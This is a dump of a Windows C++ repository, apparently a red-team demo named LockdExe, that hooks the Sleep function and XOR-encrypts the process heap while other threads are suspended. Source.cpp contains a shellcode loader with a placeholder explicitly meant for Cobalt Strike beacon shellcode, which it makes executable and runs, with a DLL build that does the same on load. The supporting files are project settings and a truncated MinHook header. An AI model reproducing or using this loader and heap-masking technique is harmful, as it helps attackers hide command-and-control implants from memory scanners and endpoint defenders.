├── ExeDemo.gif
├── LockdExe
    ├── Libs
    │   ├── libMinHook-x64-v140-mt.lib
    │   └── libMinHook-x86-v140-mt.lib
    ├── LockdExe.sln
    ├── LockdExe
    │   ├── Encrypt.h
    │   ├── LockdExe.vcxproj
    │   ├── LockdExe.vcxproj.filters
    │   ├── LockdExe.vcxproj.user
    │   ├── Source.cpp
    │   └── SuspendThreads.h
    └── include
    │   └── MinHook.h
└── README.md


/ExeDemo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waldo-irc/LockdExeDemo/8954e010ced38a59682292b64de30584375c1962/ExeDemo.gif


--------------------------------------------------------------------------------
/LockdExe/Libs/libMinHook-x64-v140-mt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waldo-irc/LockdExeDemo/8954e010ced38a59682292b64de30584375c1962/LockdExe/Libs/libMinHook-x64-v140-mt.lib


--------------------------------------------------------------------------------
/LockdExe/Libs/libMinHook-x86-v140-mt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waldo-irc/LockdExeDemo/8954e010ced38a59682292b64de30584375c1962/LockdExe/Libs/libMinHook-x86-v140-mt.lib


--------------------------------------------------------------------------------
/LockdExe/LockdExe.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30413.136
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LockdExe", "LockdExe\LockdExe.vcxproj", "{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 		ReleaseDLL|x64 = ReleaseDLL|x64
15 | 		ReleaseDLL|x86 = ReleaseDLL|x86
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Debug|x64.Build.0 = Debug|x64
20 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Debug|x86.ActiveCfg = Debug|Win32
21 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Debug|x86.Build.0 = Debug|Win32
22 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Release|x64.ActiveCfg = Release|x64
23 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Release|x64.Build.0 = Release|x64
24 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Release|x86.ActiveCfg = Release|Win32
25 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.Release|x86.Build.0 = Release|Win32
26 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.ReleaseDLL|x64.ActiveCfg = ReleaseDLL|x64
27 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.ReleaseDLL|x64.Build.0 = ReleaseDLL|x64
28 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.ReleaseDLL|x86.ActiveCfg = ReleaseDLL|Win32
29 | 		{A35A8CAB-9746-49F8-AD67-AF2F6667F30A}.ReleaseDLL|x86.Build.0 = ReleaseDLL|Win32
30 | 	EndGlobalSection
31 | 	GlobalSection(SolutionProperties) = preSolution
32 | 		HideSolutionNode = FALSE
33 | 	EndGlobalSection
34 | 	GlobalSection(ExtensibilityGlobals) = postSolution
35 | 		SolutionGuid = {04227E59-E80A-4656-94B4-A3892BFB1016}
36 | 	EndGlobalSection
37 | EndGlobal
38 | 


--------------------------------------------------------------------------------
/LockdExe/LockdExe/Encrypt.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | void xor_bidirectional_encode(const char* key, const size_t keyLength, char* buffer, const size_t length) {
4 |     for (size_t i = 0; i < length; ++i) {
5 |         buffer[i] ^= key[i % keyLength];
6 |     }
7 | }


--------------------------------------------------------------------------------
/LockdExe/LockdExe/LockdExe.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="ReleaseDLL|Win32">
  9 |       <Configuration>ReleaseDLL</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="ReleaseDLL|x64">
 13 |       <Configuration>ReleaseDLL</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|Win32">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>Win32</Platform>
 19 |     </ProjectConfiguration>
 20 |     <ProjectConfiguration Include="Debug|x64">
 21 |       <Configuration>Debug</Configuration>
 22 |       <Platform>x64</Platform>
 23 |     </ProjectConfiguration>
 24 |     <ProjectConfiguration Include="Release|x64">
 25 |       <Configuration>Release</Configuration>
 26 |       <Platform>x64</Platform>
 27 |     </ProjectConfiguration>
 28 |   </ItemGroup>
 29 |   <PropertyGroup Label="Globals">
 30 |     <VCProjectVersion>16.0</VCProjectVersion>
 31 |     <Keyword>Win32Proj</Keyword>
 32 |     <ProjectGuid>{a35a8cab-9746-49f8-ad67-af2f6667f30a}</ProjectGuid>
 33 |     <RootNamespace>LockdExe</RootNamespace>
 34 |     <WindowsTargetPlatformVersion>10.0.18362.0</WindowsTargetPlatformVersion>
 35 |   </PropertyGroup>
 36 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 37 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 38 |     <ConfigurationType>Application</ConfigurationType>
 39 |     <UseDebugLibraries>true</UseDebugLibraries>
 40 |     <PlatformToolset>v142</PlatformToolset>
 41 |     <CharacterSet>MultiByte</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 44 |     <ConfigurationType>Application</ConfigurationType>
 45 |     <UseDebugLibraries>false</UseDebugLibraries>
 46 |     <PlatformToolset>v140</PlatformToolset>
 47 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 48 |     <CharacterSet>Unicode</CharacterSet>
 49 |   </PropertyGroup>
 50 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|Win32'" Label="Configuration">
 51 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 52 |     <UseDebugLibraries>false</UseDebugLibraries>
 53 |     <PlatformToolset>v140</PlatformToolset>
 54 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 55 |     <CharacterSet>MultiByte</CharacterSet>
 56 |   </PropertyGroup>
 57 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 58 |     <ConfigurationType>Application</ConfigurationType>
 59 |     <UseDebugLibraries>true</UseDebugLibraries>
 60 |     <PlatformToolset>v142</PlatformToolset>
 61 |     <CharacterSet>MultiByte</CharacterSet>
 62 |   </PropertyGroup>
 63 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 64 |     <ConfigurationType>Application</ConfigurationType>
 65 |     <UseDebugLibraries>false</UseDebugLibraries>
 66 |     <PlatformToolset>v140</PlatformToolset>
 67 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 68 |     <CharacterSet>MultiByte</CharacterSet>
 69 |   </PropertyGroup>
 70 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|x64'" Label="Configuration">
 71 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 72 |     <UseDebugLibraries>false</UseDebugLibraries>
 73 |     <PlatformToolset>v140</PlatformToolset>
 74 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 75 |     <CharacterSet>MultiByte</CharacterSet>
 76 |   </PropertyGroup>
 77 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 78 |   <ImportGroup Label="ExtensionSettings">
 79 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 80 |   </ImportGroup>
 81 |   <ImportGroup Label="Shared">
 82 |   </ImportGroup>
 83 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 84 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 85 |   </ImportGroup>
 86 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 87 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 88 |   </ImportGroup>
 89 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|Win32'" Label="PropertySheets">
 90 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 91 |   </ImportGroup>
 92 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 93 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 94 |   </ImportGroup>
 95 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 96 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 97 |   </ImportGroup>
 98 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|x64'" Label="PropertySheets">
 99 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
100 |   </ImportGroup>
101 |   <PropertyGroup Label="UserMacros" />
102 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
103 |     <LinkIncremental>true</LinkIncremental>
104 |   </PropertyGroup>
105 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
106 |     <LinkIncremental>false</LinkIncremental>
107 |   </PropertyGroup>
108 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|Win32'">
109 |     <LinkIncremental>false</LinkIncremental>
110 |   </PropertyGroup>
111 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
112 |     <LinkIncremental>true</LinkIncremental>
113 |   </PropertyGroup>
114 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
115 |     <LinkIncremental>false</LinkIncremental>
116 |   </PropertyGroup>
117 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|x64'">
118 |     <LinkIncremental>false</LinkIncremental>
119 |   </PropertyGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
121 |     <ClCompile>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <SDLCheck>true</SDLCheck>
124 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
125 |       <ConformanceMode>true</ConformanceMode>
126 |     </ClCompile>
127 |     <Link>
128 |       <SubSystem>Console</SubSystem>
129 |       <GenerateDebugInformation>true</GenerateDebugInformation>
130 |     </Link>
131 |   </ItemDefinitionGroup>
132 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
133 |     <ClCompile>
134 |       <WarningLevel>Level3</WarningLevel>
135 |       <FunctionLevelLinking>true</FunctionLevelLinking>
136 |       <IntrinsicFunctions>true</IntrinsicFunctions>
137 |       <SDLCheck>true</SDLCheck>
138 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
139 |       <ConformanceMode>true</ConformanceMode>
140 |       <AdditionalIncludeDirectories>../;../include;</AdditionalIncludeDirectories>
141 |     </ClCompile>
142 |     <Link>
143 |       <SubSystem>Console</SubSystem>
144 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
145 |       <OptimizeReferences>true</OptimizeReferences>
146 |       <GenerateDebugInformation>true</GenerateDebugInformation>
147 |       <AdditionalLibraryDirectories>../Libs;</AdditionalLibraryDirectories>
148 |     </Link>
149 |   </ItemDefinitionGroup>
150 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|Win32'">
151 |     <ClCompile>
152 |       <WarningLevel>Level3</WarningLevel>
153 |       <FunctionLevelLinking>true</FunctionLevelLinking>
154 |       <IntrinsicFunctions>true</IntrinsicFunctions>
155 |       <SDLCheck>true</SDLCheck>
156 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;RELEASE_DLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
157 |       <ConformanceMode>true</ConformanceMode>
158 |       <AdditionalIncludeDirectories>../;../include;</AdditionalIncludeDirectories>
159 |     </ClCompile>
160 |     <Link>
161 |       <SubSystem>Windows</SubSystem>
162 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
163 |       <OptimizeReferences>true</OptimizeReferences>
164 |       <GenerateDebugInformation>true</GenerateDebugInformation>
165 |       <AdditionalLibraryDirectories>../Libs;</AdditionalLibraryDirectories>
166 |     </Link>
167 |   </ItemDefinitionGroup>
168 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
169 |     <ClCompile>
170 |       <WarningLevel>Level3</WarningLevel>
171 |       <SDLCheck>true</SDLCheck>
172 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
173 |       <ConformanceMode>true</ConformanceMode>
174 |       <ExceptionHandling>Sync</ExceptionHandling>
175 |       <AdditionalIncludeDirectories>../include;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
176 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
177 |     </ClCompile>
178 |     <Link>
179 |       <SubSystem>Console</SubSystem>
180 |       <GenerateDebugInformation>true</GenerateDebugInformation>
181 |       <AdditionalDependencies>Crypt32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
182 |       <AdditionalLibraryDirectories>..\libs;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
183 |     </Link>
184 |   </ItemDefinitionGroup>
185 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
186 |     <ClCompile>
187 |       <WarningLevel>Level3</WarningLevel>
188 |       <FunctionLevelLinking>true</FunctionLevelLinking>
189 |       <IntrinsicFunctions>true</IntrinsicFunctions>
190 |       <SDLCheck>true</SDLCheck>
191 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
192 |       <ConformanceMode>true</ConformanceMode>
193 |       <AdditionalIncludeDirectories>../;../include;</AdditionalIncludeDirectories>
194 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
195 |     </ClCompile>
196 |     <Link>
197 |       <SubSystem>Console</SubSystem>
198 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
199 |       <OptimizeReferences>true</OptimizeReferences>
200 |       <GenerateDebugInformation>true</GenerateDebugInformation>
201 |       <AdditionalLibraryDirectories>../Libs;</AdditionalLibraryDirectories>
202 |       <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
203 |     </Link>
204 |   </ItemDefinitionGroup>
205 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseDLL|x64'">
206 |     <ClCompile>
207 |       <WarningLevel>Level3</WarningLevel>
208 |       <FunctionLevelLinking>true</FunctionLevelLinking>
209 |       <IntrinsicFunctions>true</IntrinsicFunctions>
210 |       <SDLCheck>true</SDLCheck>
211 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;RELEASE_DLL64;%(PreprocessorDefinitions)</PreprocessorDefinitions>
212 |       <ConformanceMode>true</ConformanceMode>
213 |       <AdditionalIncludeDirectories>../;../include;</AdditionalIncludeDirectories>
214 |     </ClCompile>
215 |     <Link>
216 |       <SubSystem>Windows</SubSystem>
217 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
218 |       <OptimizeReferences>true</OptimizeReferences>
219 |       <GenerateDebugInformation>false</GenerateDebugInformation>
220 |       <AdditionalLibraryDirectories>../Libs;</AdditionalLibraryDirectories>
221 |     </Link>
222 |   </ItemDefinitionGroup>
223 |   <ItemGroup>
224 |     <ClCompile Include="Source.cpp" />
225 |   </ItemGroup>
226 |   <ItemGroup>
227 |     <ClInclude Include="Encrypt.h" />
228 |     <ClInclude Include="SuspendThreads.h" />
229 |   </ItemGroup>
230 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
231 |   <ImportGroup Label="ExtensionTargets">
232 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
233 |   </ImportGroup>
234 | </Project>


--------------------------------------------------------------------------------
/LockdExe/LockdExe/LockdExe.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="Source.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClInclude Include="Encrypt.h">
24 |       <Filter>Header Files</Filter>
25 |     </ClInclude>
26 |     <ClInclude Include="SuspendThreads.h">
27 |       <Filter>Header Files</Filter>
28 |     </ClInclude>
29 |   </ItemGroup>
30 | </Project>


--------------------------------------------------------------------------------
/LockdExe/LockdExe/LockdExe.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
4 |     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
5 |   </PropertyGroup>
6 | </Project>


--------------------------------------------------------------------------------
/LockdExe/LockdExe/Source.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <MinHook.h>
  3 | 
  4 | // Custom libs
  5 | #include "Encrypt.h"
  6 | #include "SuspendThreads.h"
  7 | 
  8 | #if defined _M_X64
  9 | #pragma comment(lib, "libMinHook-x64-v140-mt.lib")
 10 | #elif defined _M_IX86
 11 | #pragma comment(lib, "libMinHook-x86-v140-mt.lib")
 12 | #endif
 13 | 
 14 | // Encryption Key
 15 | const char key[2] = "A";
 16 | size_t keySize = sizeof(key);
 17 | 
 18 | PROCESS_HEAP_ENTRY entry;
 19 | void HeapEncryptDecrypt() {
 20 |     SecureZeroMemory(&entry, sizeof(entry));
 21 |     while (HeapWalk(GetProcessHeap(), &entry)) {
 22 |         if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
 23 |             xor_bidirectional_encode(key, keySize, (char*)(entry.lpData), entry.cbData);
 24 |         }
 25 |     }
 26 | }
 27 | 
 28 | void(WINAPI* OldSleep)(DWORD dwMiliseconds);
 29 | //Hooked Sleep
 30 | void WINAPI HookedSleep(DWORD dwMiliseconds) {
 31 |     DWORD time = dwMiliseconds;
 32 |     if (time > 1000) {
 33 |         DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
 34 |         HeapEncryptDecrypt();
 35 | 
 36 |         OldSleep(dwMiliseconds);
 37 | 
 38 |         HeapEncryptDecrypt();
 39 |         DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
 40 |     }
 41 |     else {
 42 |         OldSleep(time);
 43 |     }
 44 | }
 45 | 
 46 | template <typename T>
 47 | inline MH_STATUS MH_CreateHookEx(LPVOID pTarget, LPVOID pDetour, T** ppOriginal)
 48 | {
 49 |     return MH_CreateHook(pTarget, pDetour, reinterpret_cast<LPVOID*>(ppOriginal));
 50 | }
 51 | 
 52 | template <typename T>
 53 | inline MH_STATUS MH_CreateHookApiEx(
 54 |     LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, T** ppOriginal)
 55 | {
 56 |     return MH_CreateHookApi(
 57 |         pszModule, pszProcName, pDetour, reinterpret_cast<LPVOID*>(ppOriginal));
 58 | }
 59 | 
 60 | int main()
 61 | {
 62 |     //DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
 63 |     // Initialize MinHook.
 64 |     if (MH_Initialize() != MH_OK)
 65 |     {
 66 |         return 1;
 67 |     }
 68 | 
 69 |     if (MH_CreateHookApiEx(
 70 |         L"kernel32.dll", "Sleep", &HookedSleep, &OldSleep) != MH_OK)
 71 |     {
 72 |         return 1;
 73 |     }
 74 | 
 75 |     // Enable the hook for MessageBoxW.
 76 |     if (MH_EnableHook(MH_ALL_HOOKS) != MH_OK)
 77 |     {
 78 |         return 1;
 79 |     }
 80 |     //DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
 81 | 
 82 | #if !defined(RELEASE_DLL) && !defined(RELEASE_DLL64)
 83 |     // Cobalt Strike Shellcode goes here.
 84 |     // Made with Payload Generator -> C -> Tick x64.
 85 |     unsigned char dll[] = ""; // Change this
 86 |     // This size also comes from the generated payload file
 87 |     SIZE_T size = 0; // Change This
 88 |     SIZE_T bytesWritten = 0;
 89 |     DWORD oldProtect = 0;
 90 |     void* sh = VirtualAllocEx(GetCurrentProcess(), 0, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 91 |     WriteProcessMemory(GetCurrentProcess(), sh, dll, size, &bytesWritten);
 92 |     VirtualProtectEx(GetCurrentProcess(), sh, size, PAGE_EXECUTE_READ, &oldProtect);
 93 |     ((void(*)())sh)(); // Comment this and uncomment the 2 below to do this in a seperate thread instead.
 94 |     //CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)sh, NULL, 0, &hookID);
 95 |     //while (TRUE);
 96 | #endif
 97 |     return 0;
 98 | }
 99 | 
100 | #if defined(RELEASE_DLL) || defined(RELEASE_DLL64)
101 | BOOL WINAPI DllMain(
102 |     HINSTANCE hinstDLL,  // handle to DLL module
103 |     DWORD fdwReason,     // reason for calling function
104 |     LPVOID lpReserved)  // reserved
105 | {
106 |     // Perform actions based on the reason for calling.
107 |     switch (fdwReason)
108 |     {
109 |     case DLL_PROCESS_ATTACH:
110 |         // Initialize once for each new process.
111 |         // Return FALSE to fail DLL load.
112 |         main();
113 |         break;
114 | 
115 |     case DLL_THREAD_ATTACH:
116 |         // Do thread-specific initialization.
117 |         break;
118 | 
119 |     case DLL_THREAD_DETACH:
120 |         // Do thread-specific cleanup.
121 |         break;
122 | 
123 |     case DLL_PROCESS_DETACH:
124 |         // Perform any necessary cleanup.
125 |         break;
126 |     }
127 |     return TRUE;  // Successful DLL_PROCESS_ATTACH.
128 | }
129 | #endif


--------------------------------------------------------------------------------
/LockdExe/LockdExe/SuspendThreads.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <tlhelp32.h>
 3 | 
 4 | // Pass 0 as the targetProcessId to suspend threads in the current process
 5 | void DoSuspendThreads(DWORD targetProcessId, DWORD targetThreadId)
 6 | {
 7 |     HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
 8 |     if (h != INVALID_HANDLE_VALUE)
 9 |     {
10 |         THREADENTRY32 te;
11 |         te.dwSize = sizeof(te);
12 |         if (Thread32First(h, &te))
13 |         {
14 |             do
15 |             {
16 |                 if (te.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID))
17 |                 {
18 |                     // Suspend all threads EXCEPT the one we want to keep running
19 |                     if (te.th32ThreadID != targetThreadId && te.th32OwnerProcessID == targetProcessId)
20 |                     {
21 |                         HANDLE thread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);
22 |                         if (thread != NULL)
23 |                         {
24 |                             SuspendThread(thread);
25 |                             CloseHandle(thread);
26 |                         }
27 |                     }
28 |                 }
29 |                 te.dwSize = sizeof(te);
30 |             } while (Thread32Next(h, &te));
31 |         }
32 |         CloseHandle(h);
33 |     }
34 | }
35 | 
36 | void DoResumeThreads(DWORD targetProcessId, DWORD targetThreadId)
37 | {
38 |     HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
39 |     if (h != INVALID_HANDLE_VALUE)
40 |     {
41 |         THREADENTRY32 te;
42 |         te.dwSize = sizeof(te);
43 |         if (Thread32First(h, &te))
44 |         {
45 |             do
46 |             {
47 |                 if (te.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID))
48 |                 {
49 |                     // Suspend all threads EXCEPT the one we want to keep running
50 |                     if (te.th32ThreadID != targetThreadId && te.th32OwnerProcessID == targetProcessId)
51 |                     {
52 |                         HANDLE thread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);
53 |                         if (thread != NULL)
54 |                         {
55 |                             ResumeThread(thread);
56 |                             CloseHandle(thread);
57 |                         }
58 |                     }
59 |                 }
60 |                 te.dwSize = sizeof(te);
61 |             } while (Thread32Next(h, &te));
62 |         }
63 |         CloseHandle(h);
64 |     }
65 | }
66 | 


--------------------------------------------------------------------------------
/LockdExe/include/MinHook.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  MinHook - The Minimalistic API Hooking Library for x64/x86
  3 |  *  Copyright (C) 2009-2017 Tsuda Kageyu.
  4 |  *  All rights reserved.
  5 |  *
  6 |  *  Redistribution and use in source and binary forms, with or without
  7 |  *  modification, are permitted provided that the following conditions
  8 |  *  are met:
  9 |  *
 10 |  *   1. Redistributions of source code must retain the above copyright
 11 |  *      notice, this list of conditions and the following disclaimer.
 12 |  *   2. Redistributions in binary form must reproduce the above copyright
 13 |  *      notice, this list of conditions and the following disclaimer in the
 14 |  *      documentation and/or other materials provided with the distribution.
 15 |  *
 16 |  *  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 17 |  *  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
 18 |  *  TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
 19 |  *  PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER
 20 |  *  OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 21 |  *  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 22 |  *  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
 23 |  *  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
 24 |  *  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
 25 |  *  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 26 |  *  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 27 |  */
 28 | 
 29 | #pragma once
 30 | 
 31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__)
